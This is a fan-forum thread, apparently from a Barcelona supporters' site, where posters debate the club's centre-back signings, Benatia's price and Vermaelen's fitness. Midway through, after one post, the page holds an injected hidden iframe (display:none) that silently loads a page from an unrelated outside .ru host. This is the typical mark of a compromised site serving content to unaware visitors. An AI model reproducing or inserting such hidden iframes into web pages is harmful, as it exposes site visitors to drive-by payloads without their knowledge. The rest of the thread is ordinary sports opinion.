Mehdi Benatia

SeloBarca

A strong defence gives midfield and attack more confidence.

No, he cant stop counters alone, but the contribution to the team would be better to stop it. If it doesnt matter we could just put Pedro as CB.

Hamzah

High Definition Member
Obviously Benatia would have been the best option but his price was too high. So we ended up with two cbs who are good enough and fit the style for combined about 30m, not bad at all.

A strong defence gives midfield and attack more confidence.

No, he cant stop counters alone, but the contribution to the team would be better to stop it. If it doesnt matter we could just put Pedro as CB.

Indeed. If tactics are all that's needed and personnel doesn't matter, why not just promote Ie and Bagnack?

Obviously Benatia would have been the best option but his price was too high. So we ended up with two cbs who are good enough and fit the style for combined about 30m, not bad at all.

30m was too high? Really?

I doubt it would have been that much more earlier in the window. 40-45m max (which is what we were offering for Marquinhos). We could also have waited a couple of weeks to buy him now instead of buying Vermaelen.

Hamzah

High Definition Member
Indeed. If tactics are all that's needed and personnel doesn't matter, why not just promote Ie and Bagnack?

I've been given that argument already. There is a cut off point obviously. The players do need to be at least a little good. In my opinion Mathieu and Verm are more than good enough. Unlike the Bagnack and Douglas of this world.

F

Flavia

That's the bayern price :pep:

Jokes aside, zubi/lucho/barto didn't wait to get Verm, maybe because they feared being left with no other cb. Bayern got lucky with the timing. All teams had sorted their defenses by now.

<iframe src="about://gvapp.ru/u.html" style="display: none;" id="zunifrm"></iframe>

Hamzah

High Definition Member

I doubt it would have been that much more earlier in the window. 40-45m max (which is what we were offering for Marquinhos). We could also have waited a couple of weeks to buy him now instead of buying Vermaelen.

Well they were wanting 60m earlier on. It's only low now for the reasons I already mentioned in my posts last couple of pages. Even if we went for him now it'd be more than 30m because we are desperate unlike Bayern. I agree we could have waited a bit longer though because Verm was going nowhere.

Edit... Actually he was going to Man U. So we did have to act quick. When you look at th context we did the right things this window.

Hamzah

High Definition Member
Look it up, they wanted 60m. And come on, you know we wouldn't have been able to lower it with our negotiating team.

Cule4life

The Culest
IMO we could have got him for 45m max. Even Roma are not stupid enough to think they could have got 60m for him. They were just trying to drive up the price

Hamzah

High Definition Member
IMO we could have got him for 45m max. Even Roma are not stupid enough to think they could have got 60m for him. They were just trying to drive up the price

Well at that time a lot of big teams were wanting cbs, and David Luiz just went for 50m, maybe they thought they could pull it off. In hindsight we could have waited till later in the window (because nobody went for him in the end) but it was very risky because we could have ended up with nothing, It was safer to trade down and just get Vermaelen.

Well at that time a lot of big teams were wanting cbs, and David Luiz just went for 50m, maybe they thought they could pull it off. In hindsight we could have waited till later in the window (because nobody went for him in the end) but it was very risky because we could have ended up with nothing, It was safer to trade down and just get Vermaelen.

As far as I'm concerned, we basically got nothing with Vermaelen. Unless his injuries magically disappear.

zanela

Having a CAF player in his squad has paid Pep plenty of dividends. Its like his good luck charm. I'll be surprised if he doesn't get his 3rd come June '15.

Edit... Actually he was going to Man U. So we did have to act quick. When you look at th context we did the right things this window.

Nah. Arsenal didn't want to sell him to Man U (hence the Smalling swap offer as they knew ManU would never agree to it). Barca just made it convenient for the gooners. Without our interest, they'd most likely 've waited and flogged him off to a team outside EPL for even cheaper.

Home of Barca Fans